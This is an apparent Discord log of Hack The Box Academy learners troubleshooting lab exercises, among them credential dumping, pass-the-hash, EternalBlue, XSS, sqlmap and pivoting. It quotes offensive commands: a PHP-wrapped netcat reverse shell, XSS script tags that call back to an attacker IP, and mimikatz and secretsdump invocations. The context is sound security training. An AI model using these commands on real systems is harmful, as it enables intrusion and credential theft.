#modules

1 messages · Page 240 of 1

cloud urchin
#

i'm guessing something is wrong with the files

#

not sure where you got those files from as you didn't really include any info, but i would make sure you obtained them correctly. if you just randomly found them somewhere they may not be useful.

pliant coyote
#

I did what the course said.

limber river
#

did you solve this

cloud urchin
#

is that in a console where the user has elevated privs?

limber river
limber river
#

in linux md5sum sam.save

cloud urchin
rustic sage
#

[★]$ md5sum sam.save
6808a99b9a7d854d099fa82530bd0377 sam.save

limber river
#

in windows Get-FileHash <filepath> -Algorithm MD5

#

then compare them

limber river
cloud urchin
#

with a system shell he can simply add himself a user and add them to admin group

rustic sage
#

I have followed all the steps
I also check files are transferred correctly

cloud urchin
#

what user is your shell running as

rustic sage
#

but this commad is not working
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

cloud urchin
#

the question itself also provides creds

fringe urchin
cloud urchin
#

yeah he has the user bob

#

try CME

limber river
pliant coyote
#

After move, the file is gone from the target machine, and you can't check the md5.

cloud urchin
#

copy instead of moving

limber river
fringe urchin
#

So he can check md5

limber river
cloud urchin
#

the module gives him the creds

rustic sage
fringe urchin
#

Are we sure he is in the correct directory where all 3 files are?

rustic sage
limber river
#

without .py ,you don't need the absolute path

rustic sage
#

[★]$ python3 /usr/bin/impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
File "/usr/bin/impacket-secretsdump", line 3
name_script=$(basename $0)
^
SyntaxError: invalid syntax

cloud urchin
#

don't use python, impacket-secretsdupmp is a binary itself

limber river
#

only this

rustic sage
#

[★]$ impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.12.0.dev1+20240418.131633.ea96b63a - Copyright 2023 Fortra

[-] read length must be non-negative or -1
[*] Cleaning up...

cloud urchin
#

something is up with the files

rustic sage
limber river
#

use netexec or re-do it from scratch

rustic sage
west meteor
#

Access the Sysmon App for Splunk and go to the "Reports" tab. Fix the search associated with the "Net - net view" report and provide the complete executed command as your answer. Answer format: net view /Domain:_.local .

https://academy.hackthebox.com/module/218/section/2389

what exactly shld i fix ??

pliant coyote
#

wtf?

fringe urchin
#

Delete the ones on your system

#

Then retry

jade gate
#

This is from "Web Requests" "GET" section, is this excercise broken? (I put asterisks to not reveal the flag)

cloud urchin
#

try removing the flag: portion and just put the flag in there

jade gate
#

..... I'm amazed at how much of a dumbass I can be sometimes lmfaoooo, thank you

pliant coyote
#

I'd like to know what your ping is.

#

Damn it,it's always the same problem.

sly nebula
#

"NTLM RELAY ATTACKS", Skill Assessment: I am currently stuck on Question 3 and could use some nudge. I will share what I have tried so far.

cedar void
#

right?

#

even though I am putting credentials in a login.php form ...it's capturing a GET request, not a POST request

hexed oyster
#

Hi all. I'm working on "Attacking Web Applications with Ffuf" -> Skills assessment. Is there someone I could DM with to check my work?

dim wolf
#

yes

#

it will obviously depend on the web server

#

some do GET requests, others do POST

pliant coyote
#

I don't know why I can't get this file to come through, but the other two do.

dim wolf
#

try \\10.10.15.149\share\system.save

rustic sage
# limber river use netexec or re-do it from scratch

┌─[us-academy-3]─[10.10.14.211]─[htb-ac-1120979@htb-iffg1lknpl]─[~]
└──╼ [★]$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[-] read length must be non-negative or -1
[*] Cleaning up...

#

again same error

limber river
#

no idea , dump it remotley using netexec

rustic sage
limber river
next bronze
#

read length must be non-negative or -1 your files got messed up somewhere

rustic sage
limber river
#

yes

hexed spindle
#

Anyone available to assist with the Command Injection Bypassing Blacklisted Commands module?

rustic sage
limber river
rustic sage
#

it just

] Initializing SMB protocol database
[
] Copying default configuration file
[*] Generating SSL certificate

rustic sage
limber river
#

read the section again , you are lost

next bronze
#

first run initilaise things, run it again

dim wolf
languid fjord
dim wolf
#

can't wait to see what's been cooking

quiet heart
hexed spindle
#

My issue was with syntax, figured it out.

loud dagger
#

anyone else's target systems not spawning?

limber river
quiet heart
loud dagger
#

shit

#

oh there we go it just spawned

rustic sage
loud dagger
#

hey is windows powershell harder than bash because it seems way harder than bash

#

maybe that's just because i have more experience with bash but idk

#

yeah i guess i meant intuitive

#

it seems simpler

arctic sentinel
#

Hello! I am trying to do the aritmetic intructions section of the assembly module but I get this error

#

any ideas... the assembler runs fine with other .s fules

fathom pendant
#

Take out the subdomain

#

...

#

I feel like there's something missing

#

Ah because both of those are wrong

#

It's not cto

#

Read the emails more carefully

late sinew
#

You won't get there with whois queries.

arctic sentinel
#

Hi again, anyone completed recenlty the intro to assemble language module_!

#

I cant assemble the files I am supposed to... I follow the module instructions but its not working

late sinew
#

It happens

fathom pendant
#

to be more precise the sender is CTO; but that's not their email

loud dagger
#

the infosec foundations path is kinda in a weird order
intro to bash scripting comes before web requests but web requests is listed as a prerequisite for intro to bash scripting

#

guess i'll do intro to networking next

arctic sentinel
#

Anyone working in the intro to assembly language?

sly nebula
loud dagger
arctic sentinel
#

when I run the file provided I get this as response

#

I cant follow the module guidelines

next bronze
#

which section

cloud urchin
#

maybe check out pwnedlabs

tidal mango
arctic sentinel
arctic sentinel
tidal mango
arctic sentinel
#

I try to assemble the file provided but it does not work...

tidal mango
#

I can look in a bit, that is on my linux box, this is my work computer, I will take a look when I can (probably an hour or so).

arctic sentinel
#

Ok! thanks a lot.... I will keep trying different things

tidal mango
#

feel free to dm me as well, if you would like.

next bronze
#

is your assembler script correct? try just assemble into elf and not feed it into gdb directly

junior oxide
#

im stuck at attacking coldfusion i managed to gain a shell but the question asks for the user the coldfusion is running as so i typed whoami and hostname then submitted them and got wrong answer any hints?

arctic sentinel
#

And when I use the assembler I get this error

limber river
#

even tho you should get your answer you done it correctly

arctic sentinel
#

this is the file

limber river
limber river
# arctic sentinel

even that ur program crash , you should get your answer (in this case )

arctic sentinel
#

I am readin through the sections again

next bronze
#

... you can't just do syscall without setting up the registers first

#

but you don't need to do that for this question

arctic sentinel
#

I am trying to follow what the question says...

next bronze
#

I'm talking about the syscall at the end, that's not needed and not how you use it

limber river
arctic sentinel
#

I will try to execute... I get segmentation fault

limber river
#

you don't need to worry about segfault now , if your code is write you'll get your answer

loud dagger
#

what's the difference between -contains, -equal, and -match?

fathom pendant
#

i mean...it's kinda explained right there

loud dagger
#

ok so -contains doesn't have to be case sensitive

#

but what about -equal and -match i don't really get the difference

fathom pendant
#

-match is regex

fathom pendant
#

-equal is not

arctic sentinel
#

so there is no need to execute or to debug??

loud dagger
#

ok thanks

arctic sentinel
#

I cant do either since I get the segmentation fault error

limber river
wanton idol
#

im doing the Attacking Common Applications section Application Discovery & Enumeration, i cant seem to find the header from opening the aquatone_report.html

#

im prolly blind af but i cant find it

steady dust
#

Hmm

#

Read the page source i think

cloud urchin
wanton idol
steady dust
arctic sentinel
limber river
arctic sentinel
#

this is the code...

next bronze
limber river
#

I was wrong

#

he need to run it on gdb

next bronze
#

yeah just run through it and look at $rbx

arctic sentinel
#

What is the hex value of 'rbx' at the end?

limber river
#

and see the value of rbx at the end of execution

arctic sentinel
#

since that is the question... I assume I must do something else

limber river
#

@arctic sentinel sorry for the misleading infos

arctic sentinel
#

but I cant execute... I get nothing as answer

limber river
steady dust
arctic sentinel
#

I get the segmentation fault if I try to run it

#

I placed the syscall at the end but does not solve it

#

and the syscall sections is like 5 sections ahead...

#

I am also trying to follow chatgpt instructions 😦

next bronze
#

as I've said, you don't need to use syscall. run it through gdb step by step

limber river
fathom pendant
#

just do what's explicitly in that section

limber river
arctic sentinel
#

I get this when I run it

limber river
next bronze
#

also did you break at the start?

limber river
next bronze
#

hm it should show the registers even if segfault

arctic sentinel
#

now I get something!

limber river
arctic sentinel
#

I cant do steps...

#

ohhhh yeah yeah!! got it!!

#

thanks!!!!

limber river
#

gg

next bronze
#

you don't actually need to run anything btw, just look at the code, xor 15 with 15 gets you what?

glass cosmos
#

Hi everyone just had a question, im on the Information security foundations Setting up module section installing additional tools. just wondering if this is required on the new parrot os

loud dagger
#

if the required tools aren't installed, you should install them

glass cosmos
#

this is how im typing in the command sudo apt install netcat ncat nmap wireshark tcpdump ...SNIP... git vim tmux -y

dim wolf
loud dagger
#

don't just copy and paste the commands

fathom pendant
#

you can create a list and have apt read from a list btw

next bronze
#

aren't those included by default in parrot?

loud dagger
#

that too but that's kind of a later issue

dim wolf
#

that SNIP is just to not clog the area up with text

loud dagger
#

they should be

fathom pendant
#

a lot of the tools though are installed by default in parrot

glass cosmos
#

ahhh okay, thats what i was wondering

loud dagger
#

i would be horrified if parrot doesn't include nmap

dim wolf
#

they are, i think the example was shown on an older version of parrot

fathom pendant
#

some of the more niche tools require some level of install via source

limber river
#

they teach you how to get tools by yourself

fathom pendant
limber river
#

it's not about parrot

glass cosmos
fathom pendant
#

more than likely 4.x

next bronze
fathom pendant
#

¯_(ツ)_/¯

limber river
fathom pendant
dim wolf
limber river
loud dagger
next bronze
glass cosmos
#

lol thanks everyone

winged egret
#

hello guys in the double pivoting section of the pivoting module, did anyone face problems when trying to connect proxifier to 127.0.0.1:1080 ?

cloud urchin
vestal crescent
#

what method did you use for the ptunnel section instead?

fathom pendant
#

¯_(ツ)_/¯

vestal crescent
#

i tried a handful that just arent working but ill try a few more

fathom pendant
#

i mean the other thing for ptunnel is compiling it statically

#

but i just didn't care enough to do it ¯_(ツ)_/¯

vestal crescent
#

me neither also idk how to do that

#

i remember having this exact issue with chisel but i managed to get it to work a different way

winged egret
cloud urchin
#

depends on how you set it up. 1080 is a common default port for SOCKS proxies

safe ridge
#

is there anyone who can help me with a module, i requested it through the Academy, but i used it before but eventually didn't get to speak to anyone

cloud urchin
#

just pose your question along with the module/section

safe ridge
#

Thanks you, Im in the module, Command Injections, within section Indetifying Filters, i identified the method, but it is not accepting my answer, i tried all injections, only one injection identifies but i cannot seem to give the right answer

cloud urchin
#

You can DM me what you're trying if you want and I'll take a look

safe ridge
#

thanks

loud dagger
#

extremely specific question, in powershell when you're using a command like where, what's the difference between, for example, where Name -like '*.cfg' and where {($_.Name -like "*.cfg")} because they both give the same output but this htb module just brought up the part with the curly brackets and the dollar sign and whatnot without explaining it

loud dagger
#

oh if you're doing multiple filters?

fathom pendant
#

something like that, yeah

loud dagger
#

i see

#

thanks

safe ridge
#

thanks @cloud urchin great help

valid viper
#

I don't see an example of mimikatz extracting hashes in the section the following question was asked in:

Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?

#

Is there a way to dump the NTLM hashes? Am I missing something?

valid viper
#

Never mind, got it.

#

mimikatz # lsadump::sam

inner geyser
#

Coincidence @valid viper working on the same module as me at about the same time. Pass-the-Hash module and the last question to get the flag off DC01 using a reverse shell. Used mimikatz w/ julio's hash to get a powershell session. Have a listener going. Have all the right info in the reverse shell command and am not getting a shell on the listener. Happy to DM w/ someone if they can help...would greatly appreciate it!

jagged zenith
#

Any one help me module injection attacks part skill ass

valid viper
inner geyser
valid viper
#

Is your firewall enabled?

inner geyser
valid viper
#

Well, if you have ufw or iptables up and running...

#

That can interfere with catching a shell.

inner geyser
# valid viper That can interfere with catching a shell.

the listener is on a windows machine that i'm RDP'd into so the connection is local between DC01 and MS01 which is the machine i'm logged into and have run the mimikatz commands. 443 is also allowed in which is one of the ports I've tried with the shell

valid viper
#

You're using port 443...?

inner geyser
#

i've tried several ports for fun, I don't believe the ports are the issue

valid viper
#

Port 443 is HTTPS.

#

That's an interesting way to pop shell...

#

From the lesson I mean.

inner geyser
#

yeah i used 8001 as well

cloud urchin
#

Your scenario sounds really weird. Why are you trying to get a reverse shell from DC01 if you already have command execution on DC01?

inner geyser
#

i'm on MS01, trying to get a reverse shell from DC01

cloud urchin
#

what privs do you have on DC01?

#

and how are you connected to DC01?

inner geyser
#

connected to MS01 not DC01

cloud urchin
#

ok well if you want a reverse shell from dc01, you'll need to be able to execute commands on dc01

#

can you do that?

inner geyser
#

i'm attempting to use invoke-the-hash for the reverse shell, so really i should be using the hash to get the connection from windows-to-windows or I guess I can look into cracking the hash and then doing an RDP session from MS01 to DC01. Not really party of the module but doesn't matter as long as I get there I guess lol

valid viper
#

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

inner geyser
#

that's it

cloud urchin
#

what module and section

valid viper
#

So you're catching the shell remotely via nc.exe (netcat), do you have that running?

valid viper
inner geyser
#

^

valid viper
#

And you have nc.exe running?

inner geyser
#

yes

valid viper
#

What Powershell command are you using to try to pop the shell?

#

Are you using Julio's username + hash?

inner geyser
#

Not really sure that we can post full commands in here as it could be spoilers? Anyway, I'm invoking WMIEXEC -target <target IP> -domain inlanefreight.htb -username julio -hash <hash> -command "powershell -e <insert shell from revshells>"

cloud urchin
#

well that's wrong

valid viper
#

There's the problem.

cloud urchin
#

it's Invoke-WMIExec

valid viper
#

-Target DC01

inner geyser
#

yeah

#

i have all that

cloud urchin
#

that's not what you showed us though

valid viper
#

Try inlanefreight.local

cloud urchin
#

you can DM me a screenshot of your command if you want

valid viper
#

C:\tools\mimikatz.exe privilege::debug “sekurlsa::pth /user:david /rc4:NTLM|HASH /domain:inlanefreight.local /run:cmd.exe”

#

inlanefreight.local worked for mois

cloud urchin
#

this one is inlanefreight.htb

valid viper
#

Oh interesting.

inner geyser
#

so the particular issue with this was after running import-module .\invoke-thehash.psd1....my next command began with " .\Invoke-WMIExec " when it appears it should just have been "Invoke-WMIExec" thanks @cloud urchin for clearing that up...should've tried that before

heavy marsh
#

Why do I have to put a + in the command for php shell for ls -la in this example?

#

I tried it without the + and it returned blank

#

The module doesn't explain this

rustic quiver
#

I'm working on the Shells and payloads module and i'm on the infiltrating windows section. The system is vulnerable to Eternalblue and my auxiliary shell even confirmed it, but all of the eternalblue scripts fail to create a session. What should I do?

fringe urchin
#

So the cmd is ls -la

cloud urchin
rustic quiver
cloud urchin
#

all of the options or all of the modules?

rustic quiver
#

Well now that I think about it, I didnt try msfvenom yet

fringe urchin
#

I dont remember which section it was but had trouble with eternalblue aswell. But then randomly it worked

rustic quiver
fringe urchin
#

I tried multiple eternalblues there

#

And then it randomly went through

#

But i cant find my notes about it

rustic quiver
#

Okay bet

cloud urchin
#

yeah, you have to use the correct one

#

you said you tried them all though

#

in which case it's probably your payload

rustic quiver
#

You guys set the LHOST as your machine IP right?

cloud urchin
#

yeah tun0

#

it's very likely you just didn't use the right module

fathom pendant
rustic quiver
#

Okay, I had it set to my main IP, I switched it to tun0 and am retrying..

#

maybe that was the issue

fringe urchin
#

Fk my obsidian notes got mixed up.... Holy f

#

Shells n payloads live engagment write is now john the ripper i guess💀

fathom pendant
#

all my notes for the skill assessments are using the Canvas Feature

rustic quiver
#

finally it worked

fringe urchin
#

Yea great imma have a great sleep now, knowing some of my notes are gone

rustic quiver
#

thank you guys\

rustic quiver
#

and girls^

fringe urchin
#

Which is worsesadglas

heavy marsh
#

Why am I getting blank values on the SQLMap Skills Assessment

#

tried
sqlmap -r req.txt --banner --current-user --current-db --is-dba --no-cast
with and without --no-cast

#

I just need to find out what database I'm in, but SQLMap is not working.

#

It's not in the logs either, but the logs do have some information hinting that it might be a time-based technique needed, unfortunately I'm not to that point yet, since I don't have the database

#

The "retrieved: " section is blank, there should be some kind of output there

#

Anyone have a similar issue?

ocean night
#

Check DMs 🙂

frail dawn
#

for Session Hijacking inside the Cross-Site Scripting (XSS) module.

I'm having a hard time finding the vulnerable parameter. I've put each of these payloads in each parameter (Except email) and I don't get a call back to my http server.

<script src=http://10.10.14.117/test</script>
‘><script src=http://10.10.14.117/test></script>
“><script src=http://10.10.14.117/test></script>

What else can I try? Thanks for the assist

cloud urchin
#

you need to have some kind of javascript payload

rustic sage
#

Finally got passed the VHD mounting, was always the better option to mount it in another Win VM and unlock it 👍 thanks for the help anyway

fathom pendant
#

¯_(ツ)_/¯

tulip dragon
#

after completing module if not satisfied or need more exp in that module what should i do

#

don't have htb main sub yet

#

htb won't have any box specfic for any module right it will be mix of many modules thats why i stuck there

ocean night
#

If there's a specific subject / module you want to get more experience on, there are many boxes on HTB that could cross over with what you're looking to learn. Many retired machines, covering many subjects, but many of the retired machines would require a subscription. Check out https://ippsec.rocks/?# - he has a lot of good video walkthroughs on retired machines, showing process, tooling and mindset

#

Watching his videos of course does not require a subscription, but if you wanted to play the machines, it would

tulip dragon
#

hey @goblin is your name james coz i saw htb channel in telegram with your username

ocean night
#

Many modules also have more advanced versions of them, taking it to the next level.

#

Yes it is, and you tagged the wrong person 😅

flint jungle
#

hey guys, can I get a help on skills assessment: website (bruteforcing) first question. I’ve already captured the flag on the 2nd question, but I have no idea where to find or capture the flag on the 1st question

tulip dragon
graceful mortar
mint trout
#

try with --output-file ./oracle_db.odat.save

heavy edge
#

Wit this was a month ago

#

Wot

#

Ty for help

mint trout
#

oh rip.. why tf is there just a time and not a date lmao

#

sorry.. just ran into the same error myself 🤣 this doesnt even work for some reason i had to run as sudo

opaque geyser
#

I can’t save bash script with nano! Can someone help? I’m on intro to bash scripting

mint trout
#

whats the error? i got lost

wanton idol
#

lol i saw that

#

😂

mint trout
#

😛

ocean night
#

Include the issue you're facing 😉

fleet moth
#

anyone here finished the password attacks module?

cloud urchin
#

no one

fathom pendant
#

@wary tendon I don't do random dms

#

Just ask your question here or utilize discord search to see if your q has been answered

shut quest
rustic sage
#

I'll pass for now

wary tendon
#

hey by any chance could you help me on a module im stuck and am like not sure im understanding this example
[10:48 PM]
i could share my screen with you
[10:49 PM]
its in the tomcat enumeration and discovery chapert of attacking common applications

rustic sage
#

but thanks

shut quest
#

Give it some time

rustic sage
#

I'd rather progress the material since that's not totally important right now

frail dawn
opaque geyser
#

It works on iPad just not my Linux laptop it just doesn’t work in any instance on HTB. It prints X on bash script and then I can’t exit either

soft needle
gilded ice
#

did anyone else have trouble with the footprinting dns module and if so how did you come to understand it

ocean night
#

Any specific issue @gilded ice? Feel free to DM

barren torrent
#

anyone online to help with the HTTP Attacks -> HTTP Response Splitting section question?

graceful mortar
barren torrent
#

The encoding seems right since it looks good in the log file, but not getting any hits from the admin user

acoustic owl
#

have you read the hint?

barren torrent
#

yes, tried localhost instead of the public IP if that's what you're referring too

acoustic owl
#

|| Certain special characters need to be URL encoded multiple times. There is a firewall in place that prevents the admin user from accessing any external endpoints!||

barren torrent
#

tried common HTTP ports as well

#

with localhost^

acoustic owl
#

Send me your request as a DM and I'll try to push you onto the right path. Without seeing exactly what you are doing, this is very difficult

wanton idol
frail dawn
wanton idol
frail dawn
rustic sage
#

hey guys
when I connect sudo openvpn to my VM and then ssh to Target IP it got disconnected after 2-3 minutes
why is this error am I facing?

ocean night
#

Essentially multiple connections will "fight" against each other for the connection, as VPN connections to HTB labs as not multi-tenant, e.g. only one person can utilise the VPN connection to the labs at one time.

rustic sage
#

ooh got it

hallow remnant
#

MODULE: Whitebox Attacks
SECTION: Client-Side Prototype Pollution

I'm really struggling with manifesting the attack chain in the exercise. After examining the /admin.php page contents, I thought that I was meant to forcefully have the victim promote my account, but my payload(s) haven't worked. Am I in the right ballpark?

dreamy solar
#

error message :

#

and I listen with nc -lvnp 5555

fringe urchin
arctic sentinel
dreamy solar
#

yes I am very idiot

#

thanks

dreamy solar
fringe urchin
arctic sentinel
#

Anyone working on the Intro to assemble language module?!

fiery berry
civic locust
#

Hey. Have somoune passed "PIVOTING, TUNNELING, AND PORT FORWARDING"?

cloud urchin
tranquil plover
#

Currently working skills assessment for intor to Digital Forensics and I completed all questions but the third one asking about the registry key used for persistance. I am pretty sure i found it but not sure why its not taking. is there a specific format it wants?

devout thorn
fiery berry
coarse schooner
#

working on the file inclusion skills assessment, I'm super close I can feel it, probably just need to use traversal.

#

I'm 60% there, this one really uses all the module!

cedar yew
#

Hello guys,

Which command should I use to see only the scan result to see these details in my search?

cloud urchin
#

proxychains -q will squelch errors

cedar yew
#

I can't see what level my scan is at this time

cloud urchin
#

then be patient, you have no verbosity set on the nmap command so you're not going to see anything until it's done

cedar yew
#

oky thanks

cloud urchin
#

you can add -v or -vv to the nmap command and see results right away

#

or not results, but what it's doing rather

pseudo birch
#

i believe you can also do --stats-every=5s as an nmap argument too

cedar yew
#

oh oky thx

#

i have question

pivot module - dynamic port forward socks tuneling..

first question - You have successfully captured credentials to an external facing Web Server. Connect to the target and list the network interfaces. How many network interfaces does the target web server have? (Including the loopback interface)

'i dont understand this question

#

How can I open the web page on the pivoted machine from my own browser?

gritty nexus
#

Hey everyone, question. For the Footprinting Module, SMTP section; where is this allegedly provided “footprinting-wordlist”?

gritty nexus
stable kraken
#

I can't MSG this here but why can't I MSG in general channel

ocean night
cloud urchin
devout torrent
#

God why is rdp such a pain on academy

#

Lately

cedar yew
cloud urchin
# cedar yew proxychains

proxychains isn't a tunnel, but if you're using that just type 'proxychains' before your command. like 'proxychains firefox'

cedar yew
#

yea im try but not working

shut quest
#

Lately? It's been a pain as far back as I can remember. Some were better than others but still a pain.

cloud urchin
# cedar yew yea im try but not working

You're going to have to include more information, simply stating "it's not working" doesn't help us help you. That's like me saying "just make it work then"

cedar yew
#

true sorry

#

my target machine(ubuntu) -> 10.129.247.120
my pivot machine (windows) -> 172.16.5.19

#

pivot machine ports (windows)

cloud urchin
#

if proxychains worked for nmap, it should work with any other program

#

when you type 'proxychains -q firefox' does firefox open?

cedar yew
#

I couldn't see the page

cloud urchin
#

should work then. are you sure you have the right port? did you try both http and https?

cedar yew
#

oh work

#

just had to wait patiently

high reef
#

morning everyone, i'm doing the first skill assessment on Attacking Common Applications. i'm having issues running the Poc

#

can i dm someone for help

#

no rev shell not sure why

fringe urchin
ocean night
#

Try to help, no reply, sadj

fringe urchin
#

Goblin got bannedr2panic

fringe urchin
ocean night
#

Thanks

ocean night
fringe urchin
fiery berry
# high reef

The exploit your using is not correct, must be modified

high reef
fiery berry
high reef
fiery berry
neon thorn
#

Anyone can give me a nudge on the skills assessment for the module "NTLM RELAY ATTACKS"?

dreamy yew
#

I might need some help on** Section: Whitelist Filters, Module: File Upload Attacks. Question: The above exercise employs a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to upload a PHP script and execute code to read "/flag.txt" **I have found extensions that allow me to successfully upload the php webshell to system. However, when I send a GET request to /profile_images/{file_name}?cmd=id, it will return 404.

cloud urchin
#

sounds like you're not calling to the right location/filename to me

distant island
#

can someoone help me with this one
module SQLMAP ESSENTIALS (Attack Tuning)
hint (Try to count the number of columns in the page output, and specify them for sqlmap.)

dreamy yew
#

because the browser kinda removes the /x00 when it saves the file at the /profile_images endpoint if you get what I mean

cloud urchin
#

that changes nothing about my answer. when you call to it the server gives a 404 error. 404 means the file cannot be found. which means when you're curling you are either pointing to the wrong file path or file name.

dreamy yew
#

hmmm ok ill rethink about that

cloud urchin
#

i was able to complete the entire module without null bytes

distant island
#

(Try to count the number of columns in the page output, and specify them for sqlmap )
how to do this exactly

wanton idol
distant island
late galleon
#

for the nibbles foothold what does the port need to be for netcat?

#

Getting Started - Initial Foothold

cloud urchin
wanton idol
#

did you skip the sqli fundimentals?

#

LOLL we said the same thing

fringe urchin
distant island
wanton idol
#

i recommend taking the sqli fundamentals itll make your life easier but just count the columns you see on the web page

distant island
#

but i kinda lost here how to know the number of colums without being in the database and only from sqlmap

wanton idol
#

uh bro you dont need to be in the database to know the columns, its right infront of you on the webpage

#

did you take notes about how UNON sqli works

distant island
#

aha so its a 5 ?

wanton idol
#

🤷‍♂️

#

go try and see

distant island
#

sqlmap -u "http://----" --level=5 --risk=3 --dump --batch -T flag5 --union-cols=5 ?

wanton idol
#

try and see i dont exatcly remember the commands i used

distant island
wanton idol
#

i tried it rn and i did it without the level and risk and did the union and it worked

wanton idol
#

you practically have it lol

inland shoal
#
Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

Need help on this task, Splunk module

distant island
wanton idol
#

just remove the level and risk and add the union and see

distant island
wanton idol
#

i mean youll be noisy af lol

distant island
wanton idol
#

sometimes its good to be more stealthy and cause less traffic

distant island
#

thanks mate

wanton idol
#

fs

topaz zenith
#

So I am on Kernel Exploits in the Windows Escalation Privilege Module and I keep getting this: No such file or directory: 'SYSTEM-2021-08-09' when I try to run impacket-secretsdump after I have ran HiveNightmare.exe on the host machine. I'm literally staring at it right now. Here is my command sudo impacket-secretsdump -sam SAM-2021-08-09 -security SECURITY-2021-08-09 -system SYSTEM-2021-08-09 local. (Have tried with the target IP at the end as well, just tells me Access Denied).

cloud urchin
#

well, if the file is not found you're not putting the right file name in. try starting the file name and pressting tab to auto-complete it

late galleon
#

sorry what

fringe urchin
late galleon
#

so it's 9443?

shadow dune
#

Its whatever port you make it, as long as its open for outbound traffic on the target

fringe urchin
#
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>

undone oar
#

6667252213360106

late galleon
#

well for me anyways

fringe urchin
# late galleon but the ip for the website isn't that

Well ofc it isnt. But it was the IP for the one who wrote that guide. So for you its gonna be different IP
And if you want you can change the port aswell to a random one thats not being used, example 9001. You will need to change the nc -lvnp 9001 aswell then

austere temple
#

I set the ip to domain in the host file, am on windows. but I can't still access the domain.FeelsWeirdMan

candid night
#

Hello, hello, I got two questions.

  1. Why when I do a PtH attack, mimikatz doesn't log me in as the attacked user, rather gives me a "session in the context of the user"? This idea of a context doesn't sit well in my brain.
  2. What is the difference between a PtT and overpass the hash attack? I mean more in a sense of when would I choose one over the other - they seem very similar for me
austere temple
#

yess

#

so annoying it doesn't work. probably would work on linux when it is in the /etc/hosts

#

but should work on windows aswell 🤔

fathom pendant
fathom pendant
austere temple
#

yes I did it there

fathom pendant
#

Second: your windows machine would need to be connected to the vpn

austere temple
#

I am.

#

it's just this part of the box that I have problem with

fathom pendant
#

Can you ping the ip?

austere temple
#

yes

fathom pendant
candid night
#

Okay, so they both give me the same result of lateral movement (if successful) but depending on what I find in the environment I can go with the first or the latter

austere temple
#

it's the starting thing

fathom pendant
#

If it's for a box then you'll need to verify your account following #welcome and ask in #boxes

fathom pendant
austere temple
#

no access

fathom pendant
#

:)

austere temple
#

thought so. thanks

#

fk that's a lot of work. I just wanted to practice in htb. FeelsBadMan

fathom pendant
#

It takes like 5 seconds to do

#

Lol

#

Also fwiw http://domain in the browser

#

I don't recommend using windows though for htb

#

Stick to linux/a linux vm

austere temple
#

I was using wsl2 sadglas

rain zodiac
#

hehe

fathom pendant
#

Wsl sucks

rain zodiac
#

wtf

austere temple
#

is it common people use a linux vm for htb

fathom pendant
#

Also you gotta go through a bunch of extra setup for wsl

rain zodiac
#

where the food

fathom pendant
#

Kali and Parrot are the most common

austere temple
#

which u recommend

fathom pendant
#

I prefer Parrot because less bloated software on install, but Kali is alright

#

try them both and see what you prefer ¯_(ツ)_/¯

austere temple
#

you right thanks for the info. it comes preinstalled with tools I need. like johntheripper, I have to use that in this lab

fringe urchin
glass quail
#

in the file upload skill assesment am i going the right by using svg

arctic sentinel
#

Hello everyone! I am doing the unconditional branching in the assembly language module!

#

I am stuck in here... Try to jump to "func" before "loop loop". What is the hex value of "rbx" at the end?... I modified the file provided and run the program till the end and I get 0x100000000 as rbx but its not the right answer....

#

I also tried the same value since I think the loop never happens...

fringe urchin
glass quail
#

does anybody else's target box terminate prematurely ?

fringe urchin
glass quail
#

last time it did it was up for like 20 mins

rustic sage
#

Hey guys I'm new to entering coding world so i want someone to help me

fringe urchin
glass quail
shut quest
rustic sage
#

Ok

glass quail
arctic sentinel
#

Anyone has done the unconditional branching module??

patent niche
#

Guys I know the log for this question however is not accepting it

Modify and employ the Splunk search provided at the "Detecting Kerberoasting - SPN Querying" part of this section on all ingested data (All time). Enter the name of the user who initiated the process that executed an LDAP query containing the "(&(samAccountType=805306368)(servicePrincipalName=)*" string at 2023-07-26 16:42:44 as your answer. Answer format: CORP_

This is not CORP\+user ?

zealous rune
#

Module Footprinting. Section IMAP/POP. Question: What is the admin email address? Is it asking the admin email address for the POP or IMAP service?

fathom pendant
#

It's the overall mailservice and it will be the same

#

Once you log in and retrieve the mail, you should see it

zealous rune
#

thx

fathom pendant
#

Note the 1 fetch <id> all command only collects info about the message, not the contents, so you may see a bunch of NIL

#

A link to a couple comprehensive articles re: imap

wanton idol
#

anyone know how to fix there is no available instances please try later T-T

zealous rune
#

thanks i was reading those earlier 🙂

#

what is the deal with having to precede imap commands with what seems like a random character or string

fathom pendant
zealous rune
#

like a login

fathom pendant
#

But tbh that's just the way it is

zealous rune
#

but it identifies nothing? it's just what the server expects

#

protocol idiosyncracies

#

might be idiosyncrasies

fathom pendant
#

Also keep in mind, these protocols are ancient

zealous rune
#

yep thanks

fathom pendant
#

Also I suggest playing with the body[] query

#

I.e. 1 fetch 1 body[header] iirc

zealous rune
#

\noselect flaags mean the folder cannot be selected i assume

#

indicating it's not a "real" folder?

fathom pendant
#

Perhaps

#

As you likely saw when you listed theres a drill down to a specific one also it's case sensitive

#

So "dev" isn't the same as "DEV"

#

It's one of the few things within imap that is case sensitive

zealous rune
#

good hint

fathom pendant
#

I like imap(s) purely because it's organized

zealous rune
#

mmm

#

their fun protocols

#

smtp also

#

telnet port 25... send some unsolicited mail 🙂

fathom pendant
#

Smtp just facilitates communication

zealous rune
#

yeah the glue

#

of mail

sterile epoch
#

Hi I am in attacking common applications I am looking at the modified manifest file which gives the correct path to the starter classbut I am still getting this error. I even tried double checking it by decompiling the new jar file

hallow remnant
zealous rune
#

hmmmm i'm reading the article on pop and i think it is saying you can only access the inbox?

